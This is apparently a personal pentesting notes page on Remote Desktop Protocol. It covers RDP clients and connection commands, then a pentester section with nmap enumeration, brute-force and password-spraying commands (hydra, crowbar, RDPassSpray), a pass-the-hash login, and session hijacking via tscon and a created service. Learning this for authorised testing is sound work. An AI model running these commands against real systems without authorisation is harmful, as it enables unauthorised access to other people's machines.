Remote Desktop Protocol (RDP)
Remote Desktop Protocol (RDP) is a protocol used to access a desktop with a graphical interface from another computer over a network connection.
ποΈ Port: 3389 (TCP or rarely UDP)
On Windows, there is the built-in Windows RDP Client: mstsc.exe.
There is rdesktop (1.1k β).
There is FreeRDP (7.5k β), and there is a graphical version too xfreerdp-gui (29 β).
$ xfreerdp /u:username /p:password /v:IP
$ xfreerdp /u:username /pth:hash /v:IP
$ xfreerdp /dynamic-resolution +clipboard /timeout:50000 /cert:ignore /v:IP /u:x /p:y
There is Remmina (1.9k β, apt install remmina) which has an easy-to-use graphical interface.
-
remmina: start the graphical interface- Enter the IP of the target
- Enter the credentials
- Connect
- Then, I would advise toggling "dynamic resolution update" in the left menu, so that you have a bigger screen.
- In preferences, we should be able to select a keyboard mapping
(β οΈ need check) - You can scale the screen too
RDP Pentester Notes β οΈ
Enumeration
- Using nmap to run scripts
$ # nmap RDP cookies are leaving traces (--packet-trace)
$ sudo nmap -sV -sC -p 3389 --script rdp* 10.129.201.248
Foothold
- The password may be weak and vulnerable to brute force.
$ hydra -L user.list -P password.list rdp://IP -V
$ crowbar -b rdp -s IP/32 -u username -C password.list -v -n 64
There is also RDPassSpray (0.6k β).
$ python3 RDPassSpray.py -u username -p password -t IP:port
$ python3 RDPassSpray.py -U usernames.lst -p password -t IP:port
$ python3 RDPassSpray.py [...] -d domain
$ python3 RDPassSpray.py [...] -T rdp_servers.lst
Exploitation
- RDP Session Hijacking: connect to another user session. On Windows, as admin, we can use tscon.
PS> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
On Windows Server prior to 2019 as a local administrator, we can use:
PS> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
PS> net start sessionhijack
Well-known CVEs
- BlueKeep Vulnerability (2019, RCE, unstable/BSoD)
Additional Tools
- rdp-sec-check.pl (0.2k β, 2021 πͺ¦)
π» To-do π»
Stuff that I found, but never read/used yet.
- ms-wbt-server (Windows RDP implementation)
- Network Level Authentication (NLA)